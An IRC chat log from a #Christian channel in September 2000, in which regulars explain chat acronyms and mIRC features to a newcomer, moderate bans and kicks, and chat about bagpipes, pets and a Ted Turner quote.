[00:44] <Dawn> I only understand French when I hear it[00:44] *** thumps ([email protected] l.home.com) has left #Christian[00:44] <FuNNy> great[00:44] <eagles`> on parles Anglais ici :)[00:44] *** charisma ([email protected]) Qui t (Why do people cry when they hear the word goodbye!!!!)[00:44] <Maverick> hey eagles`[00:44] <Colin^> Je parle francais mon ami[00:44] <maiang> hi egales[00:44] <maiang> hi eagles[00:44] <Jubei1> I'm a redneck commie saskatchewan hick :)[00:44] <eagles`> yo Maverick :)[00:44] <Jubei1> I don't speak french... but I can say "I loose" in ancient Greek :)[00:44] <eagles`> kewl <g>[00:44] <Jubei1> I just started learning the langua ge last week :)[00:44] <eagles`> hehe[00:45] <[Mo]-> a oui, hé bien c'est vraiment amusa nt a savoir Colin^[00:45] <eagles`> this is why I come on to IRC, to chat and have a fun time[00:45] <Jubei1> Colin, I understood. Mo, you lost me :)[00:45] *** `Ash` ([email protected]) has joined #Christian[00:45] <Colin^> brb[00:45] <[Mo]-> :P[00:45] *** Colin^ ([email protected]) has left #Christian[00:45] <Raid> Dawn: Just so you know, IRC is very addicting. :)[00:45] *** Colin^ ([email protected]) has joined #Christian[00:45] <maiang> bye[00:45] * eagles` remembers starting to learn germa n in school and the first words were vulgar when said in English[00:45] <Dawn> that i have heard and i can see why[00:45] <eagles`> I eat.... and father[00:46] *** X sets mode: +o Colin^[00:46] <eagles`> oh dear dont kick me!!!!!!!!!!![00:46] *** Colin^ sets mode: -b *!*[email protected] .*[00:46] *** Colin^ sets mode: +b *!*@202.77.100.*[00:46] *** FuNNy was kicked by Colin^ (P.S. This d oesn't mean we can't be friends)[00:46] <Dawn> can someone tell me what brb and :p means[00:46] <`Ash`> be right back[00:46] <Colin^> be right back[00:46] <Dawn> i know what lol means[00:46] <[Mo]-> k[00:46] <Colin^> :p is someone poking their tounge out[00:47] *** maiang ([email protected]) Qui t (Yesterday is History...Tomorrow is Mystery..Today is a Gift..thats why its called " pr esent "...Live it !!!)[00:47] <eagles`> brb is an acronym... be right bac k[00:47] <Dawn> thank you[00:47] <eagles`> asl often asked by filipinos, is age sex location[00:47] <eagles`> ctc is care to chat[00:47] <Dawn> oh lovely[00:47] <Jubei1> :) is something that is overused[00:47] <eagles`> rofl is rolling on the floor laug hing[00:48] <eagles`> quite something to do in real lif e :))[00:48] <eagles`> oh and rl is real life[00:48] <[Mo]-> lol[00:48] <Colin^> :oÞ[00:49] <eagles`> Dawn you are using mIRC like I am ... they have a very good series of helps on their website and in their help files[00:49] <[Mo]-> and std is something to do[00:49] <eagles`> heh didnt know that![00:49] <[Mo]-> lol[00:49] <Dawn> i should check out the help files, a nd i thank you for all your help[00:50] <eagles`> meant to add that much of the acr onyms are in those help files[00:50] *** Colin^ sets mode: -bbb *!piglet@*.mvn.n et *!*generic@*.quik.com *!*DIE@*.rcn.com[00:50] *** Colin^ sets mode: -o Colin^
[00:50] <Dawn> great to know[00:50] <Raid> Dawn: and you can learn just by bein g in chat... it's fun.[00:50] *** `Ash` ([email protected]) has left #Christian[00:50] <eagles`> sure is[00:51] <Dawn> i watched a bit here and there to ge t the jist of it.[00:51] *** Icon ([email protected]) has j oined #Christian[00:51] <eagles`> sometimes its boring, sometimes i nfuriating, but mostly it's great... and as Raid said, can become addictive very easily[00:51] <Maverick> Oh no.[00:51] *** gen|c0de ([email protected] m) has joined #Christian[00:52] <Colin^> wb gen|c0de[00:52] <gen|c0de> crap.[00:52] <Dawn> i know i need to be careful, often i am not doing to much so this could become a habit that may not be to good[00:52] <gen|c0de> i was sitting there playing with identd[00:52] <gen|c0de> and i went hrm[00:52] <gen|c0de> dude its only a nick ban[00:52] <gen|c0de> regardless[00:52] *** Icon ([email protected]) has l eft #Christian[00:52] <Colin^> gen|c0de I removed the ban[00:52] <eagles`> Dawn you need to be careful to wh om you give personal details because cyber stalking is a very realproblem[00:53] <gen|c0de> no you didnt[00:53] <Colin^> Yes I did kid[00:53] <gen|c0de> unless you di it just like 5 sec onds ago[00:53] <gen|c0de> hi raid[00:53] <Colin^> I did[00:53] <gen|c0de> :)[00:53] *** Icon ([email protected]) ha s joined #Christian[00:53] <Raid> gen|c0de: heh, hello ;p[00:53] <Dawn> i understand that, I knew someone wh o got into trouble[00:53] *** generic ([email protected] m) has joined #Christian[00:53] <Colin^> ** Colin^ sets mode: -bbb *!piglet @*.mvn.net *!*generic@*.quik.com *!*DIE@*.rcn.com[00:53] <Colin^> (eagles`): meant to add that much of the acronyms are in those help files[00:53] *** Icon ([email protected]) Qu it (Read error to Icon[idxwc07-08.idx.com.au]: EOF from client)[00:53] <eagles`> gen|c0de I wonder why you are arg uing?you are in here... therefore no ban... as I see it[00:53] <Colin^> gen|c0de see it?[00:53] <gen|c0de> ah well you just did it a few mi nutes ago[00:54] <generic> this is me too[00:54] <eagles`> so what buddy? grrrrrrrr[00:54] <Colin^> Make one of them go generic[00:54] <Dawn> how does one get banned?[00:54] <gen|c0de> regardless, learn how to do bans correctly[00:54] <gen|c0de> better yet[00:54] <eagles`> very easily lol[00:54] *** X sets mode: +o Colin^[00:54] <eagles`> here it comes[00:54] *** gen|c0de ([email protected] m) has left #Christian[00:54] <eagles`> lol[00:54] <Dawn> lol[00:54] <Colin^> Thanks[00:54] *** generic ([email protected] m) has left #Christian[00:55] *** generic ([email protected] m) has joined #Christian[00:55] <eagles`> hmmm my script didnt pick up the clone[00:55] *** FlyGuy_38 ([email protected] el.ca) has joined #Christian[00:55] *** BassPlaye ([email protected]. net) has joined #Christian[00:55] <Colin^> Hey BassPlaye[00:55] <generic> hey i just realized my part messa ge didnt come through[00:55] <BassPlaye> hi[00:55] <eagles`> hey the canuks are coming in fast
[00:55] <Colin^> Hello FlyGuy_38[00:55] <eagles`> hi BassPlaye[00:55] <generic> you can go fuck yourtself cause i didnt want to be here anyways[00:55] *** generic ([email protected] m) has left #Christian[00:55] <FlyGuy_38> hi[00:56] *** X sets mode: +o eagles`[00:56] <eagles`> i have word kick enabled[00:56] <Dawn> now now watch your language:)[00:56] *** rts ([email protected] ome.com) has joined #Christian[00:56] <Colin^> Hi rts[00:56] <rts> yo[00:56] <eagles`> hey rts[00:56] *** Colin^ sets mode: -o Colin^[00:57] <rts> greetings[00:57] <eagles`> duh didnt mean to push you off th e pole Colin^[00:57] <Colin^> eagles` tis ok, I wanted to read a newsgroup[00:57] *** weird ([email protected] .net) has joined #Christian[00:58] <weird> oh oh i am there[00:58] *** JAA98 ([email protected]) has joine d #Christian[00:58] <eagles`> Dawn you were asking about bannin g... we are pretty tolerant here excepyt with those who come in deliberately to make trouble[00:58] <weird> apologies peoples[00:59] <Dawn> i see, this is good:)[00:59] <PaganJoy> hi Dawn[00:59] <Dawn> Hi[01:00] <weird> i am not weird[01:00] <Dawn> i'm sure you're not[01:00] <Jubei1> Your name is misleading then :)[01:00] <Raid> Dawn: Just play it cool and bans are n't something you'll have to worry about. [01:00] <Jubei1> Myself, I'm completely mad[01:00] <weird> its a mistaken story too long to te ll[01:00] <eagles`> we have a three-strikes-and-you-a re-out policy generally speaking, a "kick" to remove ppl, and finally on the third offe nce a ban which runs for 24 hours typically[01:01] *** Philip15 ([email protected]) has jo ined #Christian[01:01] <Jubei1> I play in large vats of jelly[01:01] <Jubei1> I scream at the top of my lungs[01:01] <weird> how do you mark?[01:01] <Jubei1> I live to laugh and be jolly[01:01] *** Philip15 ([email protected]) Quit ( don't love me from what u intend or hope that I would be, and if ur only using me to feed ur fantasy, you're not really in love, so let me go, I must be free!!!)[01:01] <eagles`> Jubei1 sounds a sticky sort of si tuation to me :)[01:01] <Jubei1> and I stuff my face with fresh bak ed buns[01:01] <Jubei1> (I mean that in a totally non-sexu al way)[01:02] *** Disconnected[01:02] * Raid is away since 01:02:26 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.[01:02] *** Attempting to rejoin...#CHristian Cannot send to channel[01:02] * Raid has returned ( Auto-Away: Not here ) - on 01:02:29 @ 09/09/2000 - Away 0 minutes.[01:02] *** Rejoined channel #christian[01:02] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'[01:02] *** Set by Beukeboom on Fri Sep 08 03:42:57[01:02] -logos3- http://www.forchrist.net - channel website, for rules and other info.[01:02] <Jubei1> Once I was a philosophy major :)[01:02] <PaganJoy> wb Raid![01:02] <Raid> My isp has got to get that fixed.[01:02] <Jubei1> Once when my sanity was still inta ct[01:02] <weird> well no i don't know....[01:03] <Jubei1> But then... oh poor fortune that i s me... it cracked... it cracked...[01:03] <eagles`> hey the pagster didnt see you !!! !!!!!!!!!!!!!!!!!!!!!!![01:03] * Jubei1 brays laughing uncontrollably
[01:03] <PaganJoy> eagles!! hiya!!!!!!!! :)[01:03] <eagles`> like a cuppa tea?[01:03] <PaganJoy> Jubei-- go "The Nanny"'s laugh d own pat? ;)[01:03] <weird> yeah i would ta:)[01:03] <PaganJoy> mmm tea!![01:04] <eagles`> Dawn there's also sounds linked t o irc... does your computer have a sound card?[01:04] <Jubei1> Pagan> If it was... then I would b e deranged, not merely mad[01:04] <weird> green preferable [01:04] *** sWeAtPeA ([email protected]) has joined #CHristian[01:04] <Jubei1> But I am mad you see, and I'm also nutty[01:04] <eagles`> if someone plays a sound your mir c can find, yours then plays the same one[01:04] * PaganJoy nods solemnly[01:04] <Jubei1> Which explains why women seem to l ike me with ice cream and other sweet things[01:04] * eagles` likes nutty.old navy expression f or chocolate[01:04] <weird> yeah yeah i dont do wavs:)[01:04] <Dawn> i do not believe so. I am also new t o the full extent of the computer world[01:05] <eagles`> thats fine:)[01:05] <eagles`> you know the diff between :) and :( ??[01:05] <Jubei1> Whenever they see me they start sh aking the cans, or scooping the tubs[01:05] <Dawn> yes[01:05] <Jubei1> They cover me, and then eat me all up[01:05] <Jubei1> Cause I'm nutty[01:05] * Jubei1 strolls around with a monacle and tophat[01:06] <Jubei1> See... completely nutty... *twirls his cane*[01:06] *** ^jer-bear ([email protected]) has joined #CHristian[01:06] <Dawn> i don't like being :( only :)[01:06] <weird> who are you asking this eagle?:):([01:06] <eagles`> talking to Dawn who is new to IRC[01:06] <weird> oh[01:06] <weird> ok[01:07] <Jubei1> But I think I'm going to retire fr om being insane[01:07] <Jubei1> It is too much effort, too little pay[01:07] <eagles`> also Dawn in mirc you can use the TAB key to save typing a person's nickname... time saver... did you know that? It's c alled"nick complete"[01:07] <Jubei1> I'll miss those pretty blue things they give you to swallow at that nice place with men in white suits[01:07] <Jubei1> But I think I am ready to move on[01:07] <weird> huh[01:07] * eagles` holds the door open[01:08] <Jubei1> (Valium pills at the nuthouse) ;)[01:08] <weird> nice[01:08] *** CodePoet ([email protected] m) has joined #CHristian[01:08] <weird> like nice[01:08] *** Ixithmm (~hello@HSE-Montreal-ppp103152. sympatico.ca) Quit (Leaving)[01:08] <Jubei1> I wish I had MIRC, but instead I h ave a java applet[01:08] <Jubei1> Oops, accidently hit bold[01:08] <Dawn> I have heard of that, I'm just wingi ng this ya know:)[01:08] <CodePoet> mIRC sucks[01:08] <CodePoet> :P[01:08] <weird> not a lot:)[01:09] <Jubei1> Well, to bed with I[01:09] <Jubei1> Goodnight all[01:09] *** Jubei1 ([email protected]) Quit ( Leaving)[01:09] <eagles`> bye Jubeil[01:09] *** TacoMan ([email protected] .net) has joined #CHristian[01:10] <Maverick> Oh dear.[01:10] <eagles`> oh?[01:10] * eagles` wonders why isnt in her channel 2[01:10] <weird> now you guys i have a question?[01:10] * eagles` changes nick to dumbo - all ears[01:11] <weird> IF
[01:11] <weird> if i want to join philosophy[01:11] *** FlyGuy_38 ([email protected] el.ca) has left #CHristian[01:11] <weird> and IF[01:12] <weird> if they think i am weird[01:12] *** Pipetobak ([email protected] ager.net) Quit (Ping timeout for Pipetobak[as4-dial22.flnt.mi.voyager.net])[01:13] <weird> how come its ok for me to be in chr istian?[01:13] <Colin^> weird yes[01:13] <eagles`> missed the drift of the question, sorry[01:13] *** charisma ([email protected]) has joined #CHristian[01:13] <weird> the drift was obscure... true[01:13] *** Kenshin^^ ([email protected]) has joined #CHristian[01:13] <Colin^> weird no one can se you in #christ ian from another channel anyway, its set on secret[01:14] <eagles`> see up the top it says channel mo des are +stn[01:14] <weird> not the point Colin^[01:14] *** ^_John_^ ([email protected] ) has joined #CHristian[01:14] <eagles`> secret, topics set by ops, no not ices in[01:14] *** cierra ([email protected]) has joined #CHristian[01:14] <weird> oh ok what does that that mean?[01:14] *** charisma ([email protected]) has left #CHristian[01:14] <eagles`> secret means you dont show up on someone's /whois or on /names[01:15] <weird> oh[01:15] <Dawn> now i don't understand this secret s tuff[01:15] *** [Mo]- ([email protected]) has left #CHristian (CaLiNe DE BoNnEs BiNnEs)[01:15] <eagles`> unless they are in the same secre t channel[01:15] <cierra> hi pags[01:15] <Colin^> weird so is the point " we think y ou are weird to be here ??[01:15] <cierra> :)[01:15] <eagles`> it is a protection, Dawn[01:15] *** ^_John_^ is now known as ^John^[01:15] <PaganJoy> hi cierra :)[01:15] <cierra> :)[01:15] <Colin^> HI ^John^[01:15] <Colin^> hello cierra[01:15] <cierra> hi colin[01:15] <weird> well i am but do you think so[01:15] <^John^> Hi ppl[01:15] <eagles`> yes, weird[01:15] <logos3> yes, wierd[01:15] <weird> oh oh i am assuming my nick[01:16] <Colin^> weird yes[01:16] <eagles`> snap[01:16] <weird> good one....[01:16] *** ^jer-bear ([email protected]) Quit (Leaving)[01:16] <weird> i luv it![01:16] *** jamie^16 ([email protected]) has joined #CHristian[01:16] <eagles`> brb, afk a moment ( Dawn that mea ns away from keyboard)[01:16] *** Kenshin^^ ([email protected]) Quit ((VirusScript 2øøø) GeT iT aT http://www.v2000.cjb.net/ and http://www.yasarozg.n et/)[01:18] <weird> Scotish water is soft[01:18] <weird> t[01:18] <Colin^> weird its the Peat[01:18] <weird> aaaah[01:18] <weird> like carbonated?[01:19] <Colin^> THats why they make such good Scot ch[01:19] <weird> the glens[01:19] <Colin^> The water is filtered by the Peat[01:19] <weird> aaaaah[01:19] <weird> well it is true[01:19] <weird> hair needs no conditioning[01:20] <PaganJoy> niters all
[01:20] * PaganJoy waves :)[01:20] *** PaganJoy ([email protected] .mindspring.com) Quit (Umm.. where am I going, and what's with this handbasket??)[01:21] *** BassPlaye ([email protected]. net) Quit (Ping timeout for BassPlaye[cras58p137.navix.net])[01:22] *** twile ([email protected]) has joined #CHristian[01:22] <weird> so subteranean water is not a secre t[01:22] <weird> i just went there for the first tim e last month[01:22] *** bu2zard ([email protected]) has joi ned #CHristian[01:22] <Colin^> weird to the Highlands?[01:22] <eagles`> Dawn there's another one, bbiab b e back in a bit[01:22] <weird> yes[01:22] *** Maverick ([email protected] dise.net.nz) Quit (Ping timeout for Maverick[203-79-93-232.tnt11.paradise.net.nz])[01:23] <Dawn> thanks[01:23] <weird> tho they liked me:)[01:23] *** bu2zard ([email protected]) Quit (L eaving)[01:23] *** sWeAtPeA ([email protected]) has left #CHristian (havoc.(r)oots.(r)adical)[01:23] <weird> thing i liked also was highland ban ds.....[01:24] <weird> like there was this dutch highland band[01:24] <weird> in kilts[01:24] *** danimal ([email protected] sprint.net) has joined #CHristian[01:25] <weird> nice tooo [01:25] <weird> i like a look of the kilt[01:25] <weird> but [01:25] * rts is away: not here[01:25] <weird> dutch?[01:25] *** rts ([email protected] ome.com) has left #CHristian[01:25] <Dawn> eagles` thanx for all the info and y our time out to let me know what things mean[01:25] <eagles`> we have highland bands here in Au strlai too - on the plains, lol[01:26] <eagles`> thats fine, look forward to seein g you again :)[01:26] <eagles`> take care, God bless you[01:26] <Colin^> Irish play the bagpipes as well[01:26] <weird> and pipes[01:26] <Dawn> Thanx and God Bless:)[01:26] <weird> and harps[01:26] <eagles`> yeah, they gave the Scots them as a present, and the Sciots havent seen the joke yet,lol[01:27] *** Dawn ([email protected] ) has left #CHristian[01:27] <weird> eagles that wasnt funny:([01:27] <eagles`> lol[01:27] * eagles` actually loves pipe bands[01:27] <weird> so oh ok goodie:)[01:27] <eagles`> <g>[01:28] <Colin^> I like Pipebands as well, I can st ill sing Scotland the brave[01:28] <eagles`> the first time I ever heard Amazi ng Grace it was played by a pipe band[01:28] * weird just sings psalms[01:28] <weird> well psalters[01:28] <Colin^> eagles` Paul mccartney did a bagpi pe version, remember that?[01:28] <eagles`> that would be about 1968[01:28] <weird> but is not weird[01:29] *** Bond-007 ([email protected]) has joined #CHristian[01:29] <eagles`> no, I don't. I remember a single released while I was working at the TV station at Bunbury[01:29] <Colin^> Hi Bond-007[01:29] <weird> mull of kintire[01:29] <Bond-007> Wooo!! GO GOLDEN BEARS![01:29] <Colin^> weird yep[01:29] <eagles`> thats beautiful too[01:29] <weird> yeah.....soooo gooood[01:29] <Colin^> Bond-007 Gummy bears?
[01:29] <Bond-007> Just went to my high school's fo otball game. We kicked the crud out of the other team :)[01:29] <Bond-007> No! Golden Bears!! :)[01:29] <cierra> woo hoo[01:29] <cierra> bond[01:30] *** tree` ([email protected] m) has joined #CHristian[01:30] <weird> i play mull of kintire on the piane e[01:30] <weird> ten fingers[01:30] * Colin^ prefers Gummy Bears[01:30] * Bond-007 plays Nirvana in honor of the TV HS Bears[01:30] <Bond-007> hehe Colin[01:31] <weird> mix and match[01:31] * eagles` forgets what he came on line to d o[01:31] <eagles`> grrrrrr[01:31] <weird> so (bite me)[01:32] * weird asks what Christian means?[01:32] <Bond-007> It feels so nice to sit in this chair compared to the metal benches[01:32] <Bond-007> Someone who follows Jesus Christ 's teachings is the technical term[01:32] *** Maverick ([email protected] ise.net.nz) has joined #CHristian[01:32] <twile> !seen ricky77[01:32] <Colin^> Hi Maverick[01:33] <danimal> !seen danimal[01:33] <weird> i like this room[01:33] <eagles`> weird it is an expression first u sed at Antioch on the Palestinian coast around 70AD meaning those who follow Christ... init ially a term of derision some folk will tell you[01:33] <Maverick> Hi=)[01:33] <Colin^> danimal was last on IRC channel #c hristian 8 minutes ago.][01:34] <eagles`> #Christian is a channel run by a number of Christians who are happy for anyone to come in and chat as long as they dont try and me nasty[01:34] <danimal> thanks colin[01:34] <weird> b[01:34] <eagles`> yeah typo[01:34] <weird> yeah :)[01:35] <weird> i have a dog called Solomon[01:35] <weird> same deal[01:35] * Colin^ has a Cat called MrJordan Big Eyes[01:35] *** cierra ([email protected]) has left #CHristian[01:35] <eagles`> how is MrJordonBigEyes?[01:35] -> *cierra* I think I know you from a long time ago?[01:35] <weird> well my dog is a rottweiler[01:36] <Bond-007> JordAn[01:36] <Bond-007> :)[01:36] *** konfused ([email protected] et) has joined #CHristian[01:36] <eagles`> hey!!!!!! konfused[01:36] <Colin^> eagles` he hasn't been in today, b ut his wonderings are going to be nipped in the bud soon[01:36] <Colin^> ;o)[01:36] <konfused> hello[01:37] <eagles`> lol[01:37] <Raid> My cats name is "Bug" well, it's "Si r red rusty bug." or, Bug for short ;p[01:37] <eagles`> that seems to be what gets him in to trouble[01:37] <Colin^> :o)[01:37] <weird> my cat is named jancy[01:37] *** Eponine` ([email protected] usnet.com.au) has joined #CHristian[01:37] <Colin^> Raid have you seen my cats pic onl ine yet?[01:37] *** Disconnected[01:37] * Raid is away since 01:37:58 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.[01:37] *** Attempting to rejoin...#CHristian Cannot send to channel[01:38] * Raid has returned ( Auto-Away: Not here ) - on 01:38:01 @ 09/09/2000 - Away 0 minutes.
[01:38] *** Rejoined channel #christian[01:38] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'[01:38] *** Set by Beukeboom on Fri Sep 08 03:42:57[01:38] <Bond-007> and a bunch of fish that I haven t named :)[01:38] -logos3- http://www.forchrist.net - channel website, for rules and other info.[01:38] * eagles` sends for the plumber[01:38] <Eponine`> I have 3 cats, Chloe, Furby and Sootie[01:38] <Bond-007> Furby :)[01:38] <weird> i had a dog called chloe once[01:38] <konfused> furbies? those evil owl looking things?[01:38] * Maverick has no cats.[01:38] <Eponine`> yep :)[01:38] * weird has no donkeys[01:38] <konfused> those scare me :\[01:39] <Eponine`> Furby is really fat and ORANGE a nd he purrs so loud[01:39] <konfused> i dont have a donkey either :([01:39] <Eponine`> ooh my furby doesn't scare anyon e :)[01:39] <konfused> i gots a kitty tho[01:39] <Colin^> Maverick Sophie is having kittens want one?[01:39] *** sansan` ([email protected] da.psi.net) has left #CHristian[01:39] <Eponine`> wish i had a pic scanned you wou ldn't be scared:)[01:39] <weird> i dooooo but i cant[01:39] <konfused> heh[01:40] <Eponine`> I call him Furr for short :) my friend calls him furrball[01:40] <konfused> well, i guess as long as u can t ake your cat's batteries out[01:40] *** Wildernes ([email protected] .bright.net) has joined #CHristian[01:40] <Eponine`> heheheehe[01:40] <Colin^> Hey Wildernes[01:40] <konfused> my kittie is mean :\[01:40] <Wildernes> hey colin[01:40] <Eponine`> ooh i have a mean kitty too konf used[01:40] <Colin^> =^¡^=[01:40] <Eponine`> Chloe is a mean cow of a thing : )[01:40] <konfused> it waits at the stairs.. and jum ps out at u and bites.. an it hurteses[01:40] <weird> nice one Colin[01:41] <eagles`> lol[01:41] * weird is impressed[01:41] <konfused> he's our little stair troll[01:41] <Eponine`> hahaha konfused[01:41] <Eponine`> mine comes up to you and smooche s and purrs and rubs against your legs[01:41] <Eponine`> then when you pat her she bites really hard[01:41] <Eponine`> draws blood sometimes[01:41] <Eponine`> im trying to give her away :P[01:41] <konfused> my cat doesnt do that :\ he only walks up to bite you[01:42] <Eponine`> she was a nice cat until I got f urby, i think she got jealous[01:42] * Colin^ 's Cat can ride a bike, and makes me dinner[01:42] <Eponine`> and has never gotten over it[01:42] <Bond-007> hmmm. heres a great quote:[01:42] <Bond-007> "Christians are losers."[01:42] <Bond-007> -Ted Turner[01:42] <Eponine`> LOL Colin makes you dinner????[01:42] <Eponine`> Ted Turner must suck then :P[01:42] <konfused> oh! i want your cat colin[01:42] <Colin^> Eponine` ;o)[01:42] <Bond-007> Ted Turner is not that big at th inking up memorable things to say is he?[01:42] <konfused> does he clean the house too?[01:42] * eagles` wonders Ted Turner... CNN??[01:42] <Colin^> konfused I have his pics on my web page[01:42] <Eponine`> Colin i'll trade you for Chloe?[01:42] <Bond-007> Ted Turner owns Superstation etc[01:42] <Bond-007> He owns alot of cable channels[01:43] <weird> =^!^= [01:43] <Bond-007> He owns the Atlanta Braves
[01:43] <konfused> is he cooking in the pics?[01:43] <weird> not the same[01:43] <Eponine`> :o :o =^.^= :o :o[01:43] *** Belle707 ([email protected] t) has joined #CHristian[01:43] <danimal> bond if it is not so memorable th en why are you quoteing it?[01:43] <eagles`> superstation is big in europe[01:43] * Belle707 sighs ... cant sleep.[01:43] <eagles`> i watched a bit of it when I was in Sweden oooh 10 years ago[01:43] <Eponine`> ,,,=^.^=,,, <-- that is Chloe[01:43] <Colin^> http://mysite.xtra.co.nz/~ColinRHo pper/page3.html <---Our cats pics[01:43] *** Jewelz`` ([email protected]) has joined #CHristian[01:44] <eagles`> hello Belle707 :))[01:44] <konfused> heh thats not my kitty he doesnt have clawses[01:44] <Wildernes> hey belle[01:44] <Eponine`> i will look at them collie[01:44] <Belle707> hey Wildernes[01:44] *** TallCaMan ([email protected]) has jo ined #CHristian[01:44] <Colin^> Hi Belle707[01:44] <Bond-007> danimal: because I just saw it o n a website[01:44] <weird> =^{}^=[01:44] <weird> aaaaak[01:44] <Bond-007> It was an atheist and scoffer qu ote page[01:45] <Bond-007> We spend the first[01:45] <Bond-007> to walk and talk and the next tw elve telling them to sit down and shut up.[01:45] <Bond-007> --Phyllis Diller[01:45] <Bond-007> hehehe[01:45] <weird> how do ya turn stuff ?[01:45] <^John^> Colin^ it says your page is down : /[01:45] <Eponine`> collie: are those kitten photos recent?[01:45] <danimal> so what is the purpose to quote h im?[01:45] <Eponine`> the orange one looks like furby :)[01:45] *** twile ([email protected]) Quit (Ping timeout for twile[207.0.112.77])[01:45] <Colin^> Eponine` one of them is a cat now[01:45] <^John^> I went there cuz I love kittens[01:45] <konfused> Oh! cute little kitty kats[01:45] <Bond-007> danimal: to show how ignorant so me people are[01:46] <^John^> Hey how are u ppl getting it to lo ad[01:46] *** Twinsen ([email protected] ld-online.no) has joined #CHristian[01:46] <Colin^> Have a look at Mr Jordan Big Eyes[01:46] <Eponine`> Colin did you keep any of them?[01:46] <Eponine`> John try to refresh it?[01:46] <Colin^> Eponine` yes one of the cameo one[01:46] <danimal> what makes him ignore by that quo te[01:46] <danimal> hate‚ignorance[01:46] *** cierra ([email protected]) has joined #CHristian[01:47] <Bond-007> thinking that Christians are Los ers. Its a broad vague ignorant statement.[01:47] <Raid> Colin^: HEHEHE, nice kitty ;p[01:47] <danimal> how is it ignorant?[01:47] <Colin^> Raid he is a great cat[01:48] <Wildernes> bond: but never underestimate t he abiity of the press to quote things out of context.[01:48] <konfused> silly kittys[01:48] <Eponine`> Which one is the cameo one Colin ?[01:48] <Wildernes> who knows what he might have ac tually indended to say?[01:48] <Colin^> Eponine` the light ginger ones[01:48] <Colin^> Tes Turnip?[01:48] <Colin^> Ted Turnip[01:48] <Bond-007> Does he know every Christian eve r alive?[01:48] <Eponine`> I love orange ones:)[01:48] *** Philip15 ([email protected]) has jo ined #CHristian[01:49] <konfused> aw now i wana go play wif my lil stair troll[01:49] <konfused> but he'll beat me up :|[01:49] <danimal> The only thing ignorant here is t he standard at which ted judges losing
[01:49] <Bond-007> no. So he shouldn't say "Christi ans are losers." Its his opinion too. Personally I think we are winners because through C hrist we have been saved and will live eternally for ever with the Lord and Saviour.[01:49] <weird> turnips are a dun color[01:49] <weird> oops sorry:([01:49] <Colin^> turnips are nice in soup[01:50] <Eponine`> I have 2 kittens in my room with me now, the two nice ones:) they are feeling the heat here in Rocky[01:50] <Raid> shrug, bugs making a mess with his f ood bowl.[01:50] <weird> and roasted n the oven[01:50] *** Wildernes ([email protected] .bright.net) Quit (Leaving)[01:50] *** ROCKIN4JC ([email protected]) has joined #CHristian[01:50] * konfused skips off to find her kitty kat[01:50] <Colin^> Hey ROCKIN4JC[01:50] <Raid> He likes to get it out one piece at a time with his paw, and munch it out of his paw.[01:50] <danimal> bond that's great you have a diff erent opinion[01:50] <eagles`> lol[01:50] <Raid> He always leaves big mess, where he drops some of it.[01:51] <Raid> or starts munching it, and little fr agments break off.[01:51] <ROCKIN4JC> Hey Colin[01:51] <Eponine`> Dogs have owners, Cats have staf f ~~anonomous[01:51] <Raid> messy mesy kitty[01:51] *** Adelphos (LC@PPPa45-ResaleNashville3-5R 7232.saturn.bbn.com) has joined #CHristian[01:51] <^John^> Colin^ is it listed in the directo ry?[01:51] <Colin^> Cats Rule Dogs Drool[01:51] <konfused> i found my stair troll :)[01:51] *** ROCKIN4JC ([email protected]) Qui t (Leaving)[01:51] <Raid> Colin^: heheh[01:51] <Eponine`> hehehe[01:51] <Raid> konfused: lol ;p[01:51] <Colin^> ^John^ is what?[01:51] <^John^> Your web oage[01:51] <^John^> Page even[01:52] <Eponine`> I like pigs too (the guinnea kin d) they are furry pigs[01:52] *** Adelphos (LC@PPPa45-ResaleNashville3-5R 7232.saturn.bbn.com) has left #CHristian[01:52] <weird> so are you guys seriously all chris tians?[01:52] <Eponine`> Colin, Tiger is soooo cute! it's a she isn't it? a tortoise shell?[01:52] <^John^> I am all a Christian[01:52] <Bond-007> I am weird[01:52] <Bond-007> err I am, weird[01:52] <Jewelz``> weird, not I :)[01:52] <Colin^> Eponine` yes, she squeeks like a m ouse as well[01:53] <Raid> Eponine`: I dunno about tiger, but I think the mrbig eyes one is a calico?[01:53] * weird is not convinced[01:53] <Raid> weird: No, I'm not a christian.[01:53] <Colin^> weird not everyone in here is[01:53] <Eponine`> cute colin :)))))))))[01:53] <Eponine`> what is a calico, Raid? is that the colour?[01:53] * Raid cat is a purebread long redhaired pe rsian[01:53] <Colin^> Raid Mr Jordan Big Eyes is the big cat with a coons tail, he is a Maine Coon[01:53] <Raid> Eponine`: No, it's the bred.[01:54] <danimal> weird: just like i don't have to believe an arguement to defend it[01:54] <Raid> Colin^: HAHAHA, seriously?[01:54] <Raid> he doesn't look like a coon from the pic.[01:54] <Raid> no wait, I take that back.[01:54] <Raid> he does.[01:54] <salutar> Let my mouth be filled with Thy p raise, that I may hymn Thy glory and Thy majesty all the day long[01:54] *** Skippii ([email protected] snet.com.au) has joined #CHristian[01:54] *** TallCaMan ([email protected]) Quit ( Leaving)[01:54] *** Skippii ([email protected] snet.com.au) has left #CHristian[01:54] <Raid> Colin^: how did you get a maine kitt y all the way where you are?
[01:55] <Colin^> Raid he will go for a walk around the block at night with me[01:55] <weird> calico cats are always female and c alled tortoiseshell sometimes cos of the colour mix .... this is not a dictionary definition[01:55] <Raid> weird: No...[01:55] <Colin^> Raid, someone brought the bereed o ver here[01:55] <Raid> weird: I had two male calico kitties .[01:55] <weird> no way![01:55] <Raid> weird: Yes dude.[01:55] *** Skypark ([email protected]) h as joined #CHristian[01:55] <Skypark> hi all[01:55] <salutar> Let my mouth be filled with Thy p raise, that I may hymn Thy glory and Thy majesty all the day long[01:55] <weird> always female[01:56] <eagles`> hey Skypark[01:56] <Raid> weird: hrm.. Nope. Had two calicos, and I know for a fact they were male ;p[01:56] <eagles`> amen salutar[01:56] <Colin^> weird yes tortisshell are always f emale[01:56] <Skypark> hello big ""[01:56] <Raid> standard calico[01:56] <Skypark> hello big "e"[01:56] <Skypark> :)[01:56] <weird> than you Colin[01:56] <weird> k[01:56] <Raid> they don't have the as big white spo t as colins.[01:56] <Eponine`> oooh calico and tortoishell are the same??[01:56] <Raid> Eponine`: No[01:56] <weird> yeah[01:56] <Raid> They are kinda built like siamese[01:56] <Raid> long... slender things[01:57] <weird> torti and callis are the same[01:57] <weird> mixed breeds but cute[01:57] <Raid> dude, I swear...[01:57] <Raid> they were pure calicos[01:57] <Raid> we had two of them.[01:58] 